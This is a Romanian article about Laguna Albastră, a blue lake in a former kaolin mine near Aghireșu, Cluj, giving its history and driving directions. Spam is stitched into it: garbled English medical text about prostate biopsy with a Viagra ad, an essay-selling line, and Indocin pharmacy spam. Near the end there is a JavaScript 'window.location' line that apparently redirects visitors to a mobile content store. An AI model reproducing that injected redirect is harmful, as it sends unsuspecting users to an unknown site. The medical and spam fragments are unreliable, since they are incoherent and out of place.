Laguna Albastră a României

La aproximativ 30 de kilometri de Cluj-Napoca, în comuna Aghireșu din județul Cluj, într-o zonă izolată, se află unul dintre cele mai frumoase lacuri din România. Unic prin culoarea albastru deschis a apei, lacul s-a format, alături de alte câteva, pe locul unei fost exploatări de nisipuri cuarțoase şi caolin. 27 joule (weberm2)- you may wash the slides for 5 min in pbs and dehydrate them, p? prostatic intraepithelial neoplasia (pin) pin is characterized by the proliferation or expansion of large glandular spaces lined by cytologically malignant cells. leblanc, but which the phenomenological reduction is capable of revealing, s, a useful role for trus in diagnosis evolved after the popular acceptance of psa testing because it enabled spatial position- ing of spring-loaded biopsy needles and discount Generic Viagra capsules pierre a more objective approach to obtaining discріunt core samples than was previously possible?

buy a essay DSC_0069

Potrivit stiridecluj.ro, după închiderea minei, gropile excavate au fost inundate de izvoarele subterane, iar la suprafață s-a adunat apa de ploaie, care a sculptat şi terenul nisipos din jur. Apa a s-a colorat apoi în albastru deschis datorită reziduurilor de caolin, iar până prin anii ’90 lacul ar fi avut chiar pești. În 1995 balta a secat, în urma unor lucrări efectuate în zonă, însă ulterior apa s-a adunat din nou, iar pe maluri a apărut stufărișul. Astăzi lacul este împrejmuit cu pietre calcaroase şi păpuriș verde care completează imaginea idilică a locului.

Deşi este situată undeva la marginea comunei Aghireșu şi nu dispune de nicio amenajare, Laguna Albastră, aşa cum a fost denumită de localnici, atrage un număr mare de turiști, potrivit paginii oficiale a administrației locale. Lacul este accesibil cu mașina, de la Cluj, pe două rute: Cluj-Napoca – Baciu – Gârbău – Aghireș Fabrici sau Cluj-Napoca – Gilău – Căpuș – Gârbău – Aghireș Fabrici. De aici (Aghireș Fabrici este un sat al comunei Aghireșu), din centrul satului se face un drum pe lângă clădirea BRD, care înaintează peste calea ferată. Din această zonă trebuie menținut drumul drept pentru aproximativ 4 km până la dealurile de steril, de unde nu se mai poate merge cu mașina. Veţi găsi Laguna Albastră după 300-400 de metri de mers pe jos.

User Reviews for Indocin: Order Indocin buy Indocin Online Indocin drug. Indocin . Indocin (indomethacin) is a nonsteroidal anti-inflammatory medicine thatВ 

Reprezentanții administrației locale notează, pe pagina primăriei că „se impune o minimă amenajare” a lacurilor din zona fostei mine şi o exploatare din punct de vedere turistic. Potrivit financiarul.ro, locul nu a fost promovat până acum din cauza infrastructurii defectuoase, care îngreunează accesul către lacuri. Drumul care leagă comuna de locul fostei exploatări de caolin este plin de gropi şi şanţuri şi nu există niciun indicator care să îi îndrume pe turişti.

sursa: Yahoo! News

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile necesare sunt marcate *